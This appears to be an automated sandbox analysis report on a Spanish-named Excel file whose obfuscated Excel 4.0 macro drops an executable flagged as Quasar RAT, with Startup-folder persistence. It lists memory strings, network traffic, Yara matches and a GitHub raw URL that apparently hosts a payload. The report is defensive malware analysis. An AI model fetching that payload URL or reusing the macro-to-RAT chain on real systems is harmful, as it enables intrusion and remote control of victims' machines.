Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://directory.services.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/PesterP
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 0000000A.00000003.789977084.0000000005699000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://graph.windows.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://graph.windows.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://login.windows.local
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://management.azure.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://management.azure.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://messaging.office.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://ncus-000.contentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://officeapps.live.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://onedrive.live.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://outlook.office.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk
Source: a.exe, 00000001.00000002.709635511.00000000027D3000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.772094694.00000000028B3000.00000004.00000001.sdmp, a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com4
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://settings.outlook.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://tasks.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://wus2-000.contentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp String found in binary or memory: https://www.digicert.com/
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/watch?v=Qxk6cu21JSg
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown HTTPS traffic detected: 185.162.146.6:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49755 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: a.exe, 00000001.00000002.708928788.0000000000AFB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Found Excel 4.0 Macro with suspicious formulas
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls Initial sample: High usage of CHAR() function: 23
Office process drops PE file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\ProgramData\a.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe Jump to dropped file
Detected potential crypto function
Source: C:\ProgramData\a.exe Code function: 1_2_00E6C154 1_2_00E6C154
Source: C:\ProgramData\a.exe Code function: 1_2_00E6E597 1_2_00E6E597
Source: C:\ProgramData\a.exe Code function: 1_2_00E6E598 1_2_00E6E598
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 11_2_00FAC154 11_2_00FAC154
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 11_2_00FAE598 11_2_00FAE598
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 11_2_00FAE589 11_2_00FAE589
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD579D 13_2_02BD579D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD0740 13_2_02BD0740
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD16A8 13_2_02BD16A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD16FC 13_2_02BD16FC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD16E7 13_2_02BD16E7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD17B2 13_2_02BD17B2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD178B 13_2_02BD178B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD0730 13_2_02BD0730
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD172C 13_2_02BD172C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD170F 13_2_02BD170F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD1773 13_2_02BD1773
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD175A 13_2_02BD175A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD1741 13_2_02BD1741
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD04D8 13_2_02BD04D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD04C9 13_2_02BD04C9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD3F7D 13_2_02BD3F7D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_054121F8 13_2_054121F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_054152E8 13_2_054152E8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_05411928 13_2_05411928
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_0541A710 13_2_0541A710
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_0541A6FF 13_2_0541A6FF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_054115E0 13_2_054115E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_0690BFD6 13_2_0690BFD6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_06907994 13_2_06907994
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_06E04F4F 13_2_06E04F4F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_06E03F58 13_2_06E03F58
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_06E01B88 13_2_06E01B88
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BDD250 13_2_02BDD250
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 17_2_028DC154 17_2_028DC154
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 17_2_028DE589 17_2_028DE589
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 17_2_028DE598 17_2_028DE598
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 20_2_01560740 20_2_01560740
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 20_2_0156579D 20_2_0156579D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 20_2_015604D8 20_2_015604D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 20_2_015604C9 20_2_015604C9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 20_2_01560730 20_2_01560730
Document contains embedded VBA macros
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls OLE indicator, VBA macros: true
Yara signature match
Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
